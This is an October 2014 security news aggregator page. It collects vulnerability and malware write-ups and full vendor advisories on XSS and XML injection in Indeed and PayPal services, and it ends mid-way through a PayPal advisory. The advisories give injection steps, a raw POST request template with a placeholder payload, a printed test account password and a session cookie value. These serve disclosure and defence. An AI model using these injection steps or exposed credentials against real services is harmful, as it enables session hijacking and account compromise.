Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

EBAY REFLECTED XSS

October 14, 2014, 2:53 am
$
0
0
Earlier in the year, I discovered an XSS vulnerability in the Selling Manager section of the eBay.

The problem was caused by improper escaping of the URL’s GET parameters, which were reflected back on on the page. When choosing the “drafts” section of the session manager, I noticed that several parameters appeared in the URL

more here..........https://redfern.me/ebay-xss/
Search

Truly scary SSL 3.0 vuln to be revealed soon: sources

October 14, 2014, 2:55 am
$
0
0
Gird your loins, sysadmins: The Register has learned that news of yet another major security vulnerability - this time in SSL 3.0 - is probably imminent.

Maintainers have kept quiet about the vulnerability in the lead-up to a patch release expected in in the late European evening, or not far from high noon Pacific Time.

more here............http://www.theregister.co.uk/2014/10/14/nasty_ssl_30_vulnerability_to_drop_tomorrow/

How VPN Pivoting Works (with Source Code)

October 14, 2014, 7:23 am
$
0
0
A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this capability too.

In September 2012, I built a VPN pivoting feature into Cobalt Strike. I revised my implementation of this feature in September 2014. In this post, I’ll take you through how VPN pivoting works and even provide code for a simple VPN pivoting client and server you can play with.

more here.........http://blog.cobaltstrike.com/2014/10/14/how-vpn-pivoting-works-with-source-code/

two browser mem disclosure bugs (CVE-2014-1580 and CVE-something-or-other)

October 14, 2014, 12:55 pm
$
0
0
First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused
Firefox prior to version 33 (released today) to leak bits of
uninitialized memory when rendering certain types of truncated images
onto <canvas>.

Mozilla's advisory is here:
https://www.mozilla.org/security/announce/2014/mfsa2014-78.html

Bug is here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1063733

PoC is here:
http://lcamtuf.coredump.cx/ffgif2/

Secondly, MSRC case #19611cz is a seemingly similar issue with
Internet Explorer apparently using bits of uninitialized stack data
when handling JPEG files with an oddball DHT. You should be able to
reproduce with:

http://lcamtuf.coredump.cx/iepuzzle/canvas.html

This one doesn't have a fix yet; I decided to disclose it because it
is easily hit with an existing open-source fuzzer, and because
we went past the 90-day mark without making any evident progress on
the report. The timeline is captured here:

http://lcamtuf.blogspot.com/2014/10/two-more-browser-memory-disclosure-bugs.html

Obligatory plug - both of these have been found with:
http://code.google.com/p/american-fuzzy-lop/

MindshaRE: Statically Extracting Malware C2s Using Capstone Engine

October 14, 2014, 1:11 pm
$
0
0
It’s been far too long since the last MindshaRE post, so I decided to share a technique I’ve been playing around with to pull C2 and other configuration information out of malware that does not store all of its configuration information in a set structure or in the resource section (for a nice set of publicly available decoders check out KevTheHermit’s RATDecoders repository on GitHub). Being able to statically extract this information becomes important in the event that the malware does not run properly in your sandbox, the C2s are down or you don’t have the time / sandbox bandwidth to manually run and extract the information from network indicators.


more here...........http://www.arbornetworks.com/asert/2014/10/mindshare-statically-extracting-malware-c2s-using-capstone-engine/

Two Limited, Targeted Attacks; Two New Zero-Days

October 14, 2014, 1:13 pm
$
0
0
The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft assigning CVE-2014-4148 and CVE-2014-4113 to and addressing the vulnerabilities in their October 2014 Security Bulletin.

more here............http://www.fireeye.com/blog/technical/targeted-attack/2014/10/two-targeted-attacks-two-new-zero-days.html

BSRT-2014-008 Vulnerability in BlackBerry World service affects BlackBerry 10 smartphones

October 14, 2014, 1:15 pm
$
0
0
This advisory addresses a spoofing vulnerability that is not currently being exploited but affects BlackBerry 10 smartphone customers running the BlackBerry World app.

more here..........http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB36360&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl

MSRT October 2014 – Hikiti

October 14, 2014, 1:16 pm
$
0
0
The October release of the Malicious Software Removal Tool (MSRT) is directly related to a Coordinated Malware Eradication (CME) initiative led by Novetta and with the help of many other security partners: F-Secure, ThreatConnect, ThreatTrack Security, Volexity, Symantec, Tenable, Cisco, and iSIGHT. Collaboration across private industry is crucial to addressing advanced persistent threats.

The target in this campaign is an advanced persistent threat that served as the infrastructure of actors that launched targeted attacks against multiple organizations around the world.  This month, the MSRT along with all of the partners in our Virus Information Alliance program are releasing new coverage for this infrastructure: Win32/Hikiti and some of the related malware families, Win32/Mdmbot, Win32/Moudoor, Win32/Plugx, Win32/Sensode, and Win32/Derusbi.


more here.........http://blogs.technet.com/b/mmpc/archive/2014/10/14/msrt-october-2014-hikiti.aspx
Search

SE-2014-01] Breaking Oracle Database through Java exploits (details)

October 14, 2014, 1:18 pm
$
0
0
Oracle Oct 2014 CPU addresses 22 security issues affecting Java VM
implementation embedded in Oracle Database software.

We have published details of the fixed issues and a description of
some privilege elevation techniques abusing a complete Java security
sandbox bypass condition for gaining DBA role in an environment of
Oracle Database software.

All relevant materials accompanied with Proof of Concept codes can
be found at our SE-2014-01 project details page:

http://www.security-explorations.com/en/SE-2014-01-details.html

The codes were successfully tested against Oracle Database 11g / 12c
software running on Windows x64, Linux x86/x86-64 and Solaris x86.

Published vulnerabilities demonstrate a very well known problem
related to Java SE security (insecure use of Java Reflection API).
This API was a direct cause for dozens of security issues in Java
SE reported to the vendor in 2005, 2012 and 2013.

Java exploits make it in particular easy to elevate privileges to an
administrator role in the environment of Oracle Database software.
This is primarily due to the following:
- Java type / memory safety can be broken upon a complete security
  sandbox bypass. This can be accomplished by the means of Reflection
  API manipulation or by exploiting a functionality of sun.misc.Unsafe
  class,
- Aurora JVM runs in the same process space and address space as the
  RDBMS kernel, sharing its memory heaps and directly accessing its
  relational data,
- Java VM and Oracle Database security models do not fit together. The
  security model implemented by Oracle Database lacks the advantage of
  a scoped privilege model with stack inspection [1] introduced into
  JDK 1.2 and Netscape 4.0 more than 15 years ago. As a result, arbitrary
  Java code can be successfully injected into a privileged database call
  sequence.

The above deficiencies are exploited in our POC codes. The exploitation
scenario implemented by them proceeds as following:
- a complete Java security sandbox bypass is gained with the use of a
  single or a combination of Java Reflection API issues,
- Java type / memory safety gets broken,
- arbitrary read / write access to memory is exploited to setup a given
  database privilege elevation condition. The actual privilege elevation
  occurs as a result of a careful manipulation of the content of internal
  Java VM structures or objects of system classes.

Privilege elevation techniques (or exploitation vectors) used in our POC
codes abuse the implementation of AUTHID DEFINER construct for database
procedures and functions defined in a Java language.

For definer spoofing exploitation vector, successful privilege elevation
can occur as a result of a careful manipulation of the content of internal
Java VM structures. By changing a field of eoidstkpair_handle structure to
the SYS user id value, one can easily spoof the identity of called methods
and effectively the identity seen by Oracle Database security engine.

If CREATE SESSION is the only privilege available in a target database
environment, one can modify the contents of a Java object instance from
a privileged (AUTHID DEFINER) system class in order to inject attacker's
code into a privileged call sequence. In our case, we set a field of a
carefully selected system class to the object instance controlled by an
attacker. Arbitrary method dispatch done through such a "spoofed" object
results in attacker's code being called with elevated privileges.

What's also worth to mention is that one does not need CREATE PROCEDURE
privileges in order to define arbitrary Java objects in the environment
of Oracle Database software. This privilege is primarily used by a code
that integrates Java VM with database structures (class/source/resource
handles, database tables, etc.). Introduction of a custom URL handler
(jserver:) into Oracle Database Java VM (its class loaders) created an
opportunity to load and execute arbitrary Java classes without any
privilege checks (Issue 20).

We hope that published materials become an eye-opener for all those that
were rather skeptic about the impact of Java security vulnerabilities to
server environments. Java security issues can pose a significant security
risk to any software that relies on a vulnerable Java VM implementation
processing untrusted, potentially malicious Java code.

Oracle Database is no exceptions here.

Thank you.

Best Regards,
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Understanding Java Stack Inspection, Dan S. Wallach, Edward W. Felten
    http://sip.cs.princeton.edu/pub/oakland98.pdf

One Doesn't Simply Analyze Moudoor

October 14, 2014, 1:20 pm
$
0
0
Today we are pleased to see an important milestone reached in a coordinated campaign against a sophisticated and well-resourced cyber espionage group. We have recently been participating in a Coordinated Malware Eradication initiative led by Novetta, in cooperation with other security vendors particularly iSight, Cisco, Volexity, Tenable, ThreatConnect, ThreatTrack Security, Microsoft and Symantec, in the aims of disrupting the operations of this particular group. Today, we are jointly releasing an improved level of coverage against the threats utilized by the group.

This espionage group, which we believe to have a strong Chinese nexus, has been targeting several industry sectors from finance, education and government to policy groups and think tanks. They have been operational at least since 2010.

more here..........http://www.f-secure.com/weblog/archives/00002753.html

Analysis of the Linux backdoor used in freenode IRC network compromise

October 14, 2014, 1:24 pm
$
0
0
freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC Group’s Cyber Defence Operations team provided pro bono digital forensic and reverse engineering services to assist the freenode infrastructure team with their incident response activities.

In this post we discuss a subset of the information we documented about one of the components involved in the compromise, specifically a Linux backdoor with some interesting functionality and features.

more here..........https://www.nccgroup.com/en/blog/2014/10/analysis-of-the-linux-backdoor-used-in-freenode-irc-network-compromise/

Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities

October 14, 2014, 3:37 pm
$
0
0
Document Title:
===============
Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1303


Release Date:
=============
2014-10-13


Vulnerability Laboratory ID (VL-ID):
====================================
1303


Common Vulnerability Scoring System:
====================================
3.6


Product & Service Introduction:
===============================
Find jobs using Indeed, the most comprehensive search engine for jobs. In a single search, Indeed offers free access to millions of jobs from thousands of
company websites and job boards. From search to apply, Indeed’s Job Search app helps you through the entire process of finding a new job. Since 2004, Indeed
has given job seekers free access to millions of jobs from thousands of company websites and job boards. As the leading pay-for-performance recruitment
advertising network, Indeed drives millions of targeted applicants to jobs in every field and is the most cost-effective source of candidates for thousands
of companies. We take our security very seriously and welcome any responsible disclosure of potential gaps in our systems.

(Copy of the Homepage: https://itunes.apple.com/us/app/job-search/id309735670 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Indeed.com `Job Search` v2.5 mobile web-application (api).


Vulnerability Disclosure Timeline:
==================================
2014-10-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Indeed.com (Bug Bounty)
Product: Job Search - Mobile Application API 2.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1
A persistent input validation web vulnerability has been discovered in the official Indeed.com `Job Search` v2.5 mobile web-application (api).
The persistent vulnerability allows an attacker to inject own script codes on the application-side of the vulnerable online-service module.

The vulnerability is located in the main job search input field of `Was Stichwort, Jobtitel oder Unternehmen` and `Wo Ort, Bundesland oder Postleitzahl`.
A local low privileged user account is able to inject script codes by usage of the regular search `Jobs finden` button. The injection request runs through
the mobile api and is not parsed or encoded. The attacker injects his code to the input field and can execute the code in the results page through the mobile api.
The first execution occurs on the client-side of the application.

After the first search request, the application remembers the strings and saved the information (application-side). The already injected client-side request with
the malicious code changes to the application-side attack because of the stored db context in the user profile. During the test we used js, html tags and php code
to exploit the issue and verify. The input executes frames, images and script code in the results page on the header were the vulnerable `stichwort` and `ort`
values are located. The input of the search and also the input of the stored information can be reviewed in the backend whichs needs to be verified by an higher
privileged indeed account.

The security risk of the vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the security issue
requires low user inter action & a registered low privileged mobile web application user account. Successful exploitation of the security vulnerability results in
session hijacking (user/manager/admin), persistent phishing, persistent external redirects or persistent manipulation of affected or connected module context.


Vulnerable Application(s):
                                [+] Indeed.com - Job Search v2.5 iOS Mobile Application (API)

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Was Stichwort, Jobtitel oder Unternehmen
                                [+] Wo Ort, Bundesland oder Postleitzahl

Affected Module(s):
                                [+] Job Search Results
                                [+] History - Vorherige Job suchen


1.2
A client-side cross site scripting vulnerability has been discovered in the official Indeed.com `Job Search` v2.5 mobile web-application (api).
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions informaton by client-side cross site scripting requests.

The vulnerability is located in the `Empfänger` input of the `Job Suche > Wähle Job Angebot` module. Local low privileged user accounts are able to inject
script codes to the empfänger input field of the iOS application. The result is a client-side script code execution in the context of the main job result
next to the page bottom. The attack vector is non persistent and the method to inject the malicious code is POST.  During the test we used js, html tags
and php code to exploit the issue and verify. The execution of the injected code occurs directly after the request through the api at the bottom of the job
article page next to the vulnerable `Empfänger` input.

The security risk of the vulnerability is estimated as medium  with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the security
issue requires low user inter action and no privileged mobile web application user account. Successful exploitation of the security vulnerability results in
session hijacking (user/manager/admin), non-persistent phishing, non-persistent external redirects or client-side manipulation of affected or connected module context.

Vulnerable Application(s):
                                [+] Indeed.com - Job Search v2.5 iOS Mobile Application (API)

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Job Suche > Wähle Job Angebot

Vulnerable Input(s):
                                [+] Empfänger

Affected Module(s):
                                [+] Job Suche > Job Angebot (Bottom > Empfänger)


Proof of Concept (PoC):
=======================
1.1
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Test Account:
Username: bkm@evolution-sec.com
Password: keymaster148


Manual steps to reproduce the vulnerability ...

1. Install the indeed job search v2.5 application for apple iOS (https://itunes.apple.com/us/app/job-search/id309735670)
2. Open the service and register an account
3. Login to the account
4. Open the main job search module
5. Inject your own script code payload to the vulnerable two input fields
Note: Both input fields run directly through the api of the mobile application
6. You get redirected to the results page were the execution takes place on top of the webpag context
7. Client-side reproduce successful!
8. Now we go back to the regular profile in the main app index search
Note: The mobile app allows to save the already requested context of an exisiting search (history search)
9. The `Vorherige Job suchen` allows to request the saved context and the client-side issue is now an application-side vulnerability
10. Successful reproduce of the vulnerability!


1.2
The non-persistent cross site scripting vulnerability can be exploited by remote attackers without privileged application user account and with medium or
high user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1. Install the indeed job search v2.5 application for apple iOS (https://itunes.apple.com/us/app/job-search/id309735670)
2. Open the service and register an account
3. Login to the account
4. Open the main job search module and search for any existing job name
5. Click the exisiting job article and scroll down to the page bottom
Note: The application uses the `Empfänger` to notify users and the seeker
6. Inject to the `Empfänger` input field your own payload and save by usage of send
7. The code execution occurs directly next to the vulnerable input field
Note: The context through the mobile api gets wrong validated which results in the client-side execution of code
8. Successful reproduce of the client-side vulnerability!


Picture(s):
                        ../1.png
                        ../2.png
                        ../3.png
                        ../4.png
                        ../5.png
                        ../6.png
                        ../7.png
                        ../8.png
                        ../9.png
                        ../10.png
                        ../11.png
                        ../12.png
                        ../13.png
                        ../14.png
                        ../15.png
                        ../16.png


Solution - Fix & Patch:
=======================
1.1
The first issue can be patched by a secure parse and encode of the results page were the vulnerable values execution occurs.
Filter and restrict the input of the search through the mobile ios api to prevent further persistent and non persistent attacks.

1.2
To parse the second vulnerability it is required the encode the Empfänger input field which is present in every job article. The input needs to be parse the value
to ensure attackers are not able to execute client-side attacks against customers to compromise (hijack) session information.
maybe it is wise to implement in the mobile api and app a new exception for invalid requests.


Security Risk:
==============
1.1
The security risk of the persistent and non-persistent input validation web vulnerability in the result page is estimated as medium.

1.2
The security risk of the non-persistent cross site scripting web vulnerability in the `empfänger` value is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability

October 14, 2014, 3:37 pm
$
0
0
Document Title:
===============
Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1129

PayPal Security UID: TM13a2uL


Release Date:
=============
2014-10-14


Vulnerability Laboratory ID (VL-ID):
====================================
1129


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team has discovered a filter bypass & web validation vulnerability in PayPal Inc Mail Order Shipping web application.


Vulnerability Disclosure Timeline:
==================================
2014-10-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Shipping & MOS Application - API 2013 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An input validation vulnerability has been discovered in the official Paypal MultiOrder Shipping web application (api).
The issue allows remote attackers to inject own malicious script codes on the application-side of the affected module.

The issue can be exploited by usage of a XML payload in the vulnerable module to exploit the issue on the application-side.
The script code gets execution takes place in the login procedure in the application error exception-handling. During the
testing, it was discovered that HTML is being processed without any validation using XML CDATA tags in the shipping web
application. The `Import from Paypal/Ebay`  module of the MultiOrder Shipping Application is directly affected with this
vulnerability. Exploitation of the issue executes code against people you interaction with on paypal/ebay. The issue can
be exploited by a paypal shipping multi user account or by remote interaction.The exception Source code is given below
in the poc for your reference.

The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1.
Exploitation of the persistent web vulnerability requires a low privileged paypal application user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent session hijacking, persistent phishing, persistent external redirects
to malicious source and persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Application(s):
                                [+] Paypal MultiOrder Shipping - (https://ship.paypal.com)

Vulnerable Module(s):
                                [+] Mark Order As Shipped

Vulnerable Parameter(s):
                                [+] Tracking#

Affected Module(s):
                                [+] Exception-Handling


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged web-application user
account and low user interaction (click!). For security demonstration or to reproduce the security vulnerability follow the
provided information and steps below to continue.

PoC: Payload
<![CDATA[<[PERSISTENT INJECTED ENCODED SCRIPT CODE!]')>]]>

Manual steps to reproduce the security vulnerability ...
1. Login to the Paypal MultiOrder Shipping application as a Low Priviledged user.
2. Before clicking on "Import" intercept the POST Request using Tamper Data or any Proxy Intercepting Utility / tool
3. Modify the XML field values of <ShipmentsToImport> and inject the Payload directly
4. You should get a javascript popup will proving the existence of this vulnerability
5. Successful reproduce of the local issue in the multi user account
Note: Now, we explain how the exploit the issue remotly in combination with an user user account
6. Interact after the manipulation as seller or buyer
Note: Use the already manipulated tracking information thats lead to the execution in the exception context
7. After interaction the code executes in both tracking information fields of the shipping item listings through the exception-handling
Note: The issue can be exploited by usage of the buyer or seller ability in both ways.
8. Successful exploitation of the remote vulnerability!


PoC: Exception Handling - PayPal Inc Shipping (API)

<!-- ERROR: GENERAL -->
<div id=` ` ErrorGeneral` `  style=` ` display: block;` ` >
<table>
<tbody><tr height=` ` 30` ` >
<td>
<img src=` ` images/icon_error.gif` ` >
</td>
<td id=` ` ErrorGeneralText` ` >Invalid value for: ShipmentsToImport: ` <[PERSISTENT INJECTED SCRIPT CODE!])`` >` Correct Input</iframe></td>
</tr>
</tbody></table>
</div>

Note: The vulnerable XML parameter in this case is  <ShipmentsToImport>


---PoC HTTP XML Request Logs ---
Information: Post Request Injecting the Payload
POST /cgi-bin/shipweb?cmd=import-shipments HTTP/1.1
Host: ship.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/xml; charset=UTF-8
Referer: https://ship.paypal.com/powership/shipping/dialogs/import/import.html?version=1_0_4
Content-Length: 268
Cookie: [Hidden]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<ImportShipments>
<AccountNumber>MBYAX9TQRRXHL</AccountNumber>
<ImportFromPayPal>true</ImportFromPayPal>
<ImportFromeBay>false</ImportFromeBay>
<ShipmentsToImport><![CDATA[<[PERSISTENT INJECTED SCRIPT CODE!]')>]]>''</ShipmentsToImport>
</ImportShipments>

- Response
HTTP/1.1 200 OK
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: RouxWyWiKm3aD3COV0dah-P3yUq=8zJb4FgOQ3QyTDBISYSIBB3kefJQ7mO1Q0dXMVfxNNH9O_jCvA44VtGZbUS_auLgEe8KVS-2osf_9WopL2Dx0NqZaGPDLX0TWNd3oSNQ0RKnhZYW;

domain=.paypal.com; path=/; Secure; HttpOnly
Connection: close
Content-Type: text/xml
Content-Length: 333

<?xml version="1.0" encoding="UTF-8"?>
<ImportShipmentsOutput>
        <OperationStatus>
                <StatusCode>4</StatusCode>
                <ErrorMessage>Invalid value for: ShipmentsToImport: '<[PERSISTENT INJECTED SCRIPT CODE!]>'</ErrorMessage>
                <RequiredAction>Correct input</RequiredAction>
        </OperationStatus>
</ImportShipmentsOutput>


Reference(s):
https://ship.paypal.com/
/cgi-bin/shipweb?cmd=import-shipments
https://ship.paypal.com/powership/shipping/dialogs/import/import.html
https://ship.paypal.com/powership/shipping/


Solution - Fix & Patch:
=======================
Input validation should be performed in CDATA requests of the application to parse all malicious requests in order to mitigate any
further risks associated with this vulnerability.


Security Risk:
==============
The security risk of the persistent script code inject web vulnerability in the shipping api module is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

PayPal Inc BB #98 MOS - Persistent Settings Vulnerability

October 15, 2014, 1:48 am
$
0
0
Document Title:
===============
PayPal Inc BB #98 MOS - Persistent Settings Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=983


Release Date:
=============
2014-10-13


Vulnerability Laboratory ID (VL-ID):
====================================
983


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the PayPal Inc core application api.


Vulnerability Disclosure Timeline:
==================================
2014-10-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Core Application 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability is detected in the official Paypal service application and common service api.
